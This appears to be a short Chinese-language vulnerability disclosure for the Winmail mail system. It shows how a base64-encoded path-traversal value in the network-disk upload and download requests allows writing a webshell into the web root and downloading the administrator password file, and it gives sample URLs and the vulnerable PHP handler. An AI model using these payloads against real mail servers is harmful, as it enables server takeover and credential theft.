winmail邮箱管理系统过滤不严,导致任意文件上传
需要以普通用户身份登录邮箱,登录以后有个网络磁盘功能,随意上传一个文件,选择文件上传!
上传url
http://xxx.xxx.xxx.xxx:6080/main.php?sessid=5772430e1cd708d2521d9a0dedadd904&act=netdisk&opt=html5upload&ftpfolder=Ly4uLy4uL3dlYm1haWwvd3d3Lw==&retid=0.8386508285207916
burpsuit拦截,看到其中有个ftpfolder参数,base64编码的解码后为/,通过修改ftpfolder参数为/../../webmail/www/再base64编码。/对应的原来的目录为 server/netstore/test(用户目录).
getshell成功!
同样的下载文件时修改filename参数跳转到data/adminuser.cfg 可下载管理员用户密码,密码md5加密!
/main.php?sessid=6ca89212aceb7b4b6997d3b1b4b9eaf0&act=netdisk&opt=download&ftpfolder=Lw%3D%3D&filename=cGhwaW5mby5waHA%3D&retid=33938934
对应的代码!code 区域case 'download':
$filename = base64_decode($filename);
$ftpfile = $ftpfolder;
if (substr($ftpfile, -1) != '/')
$ftpfile .= '/';
$ftpfile .= $filename;
header('Content-type: application/force-download');
header('Content-Disposition: attachment; filename="'.$filename.'"');
$localfile = $ftphandle->ftp_home_directory.$ftpfile;
//if(file_exists($localfile))
//die($localfile);
if (file_exists($localfile)) {
$length = filesize($localfile);
header('Accept-Ranges: bytes');
header('Content-Length: '.$length);
$fp = fopen($localfile, "rb");
if ($fp){
while(!feof($fp))
echo fread($fp, 655360);
fclose($fp);
}
}
都差不多不贴了!